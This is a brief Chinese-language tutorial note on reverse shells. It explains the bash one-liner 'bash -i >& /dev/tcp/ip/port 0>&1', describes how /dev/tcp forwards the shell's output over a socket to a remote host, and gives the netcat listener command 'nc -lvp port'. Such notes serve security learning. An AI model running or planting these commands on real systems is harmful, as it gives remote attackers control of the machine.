Shell
最常见命令和原理
bash -i >& /dev/tcp/ip/port 0>&1
bash -i
代表在本地打开一个bash,然后就是/dev/tcp/ip/port
, /dev/tcp/
是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&后面跟上/dev/tcp/ip/port
这个文件代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程上,如果远程开启了对应的端口去监听,就会接收到这个bash的标准输出和标准错误输出,这个时候我们在本机输入命令,输出以及错误输出的内容就会被传递显示到远程。
很详细的文章
《Linux下几种反弹Shell方法的总结与理解》
Linux 反弹shell(二)反弹shell的本质
监听命令
nc -lvp port
将port改为需要监听的端口号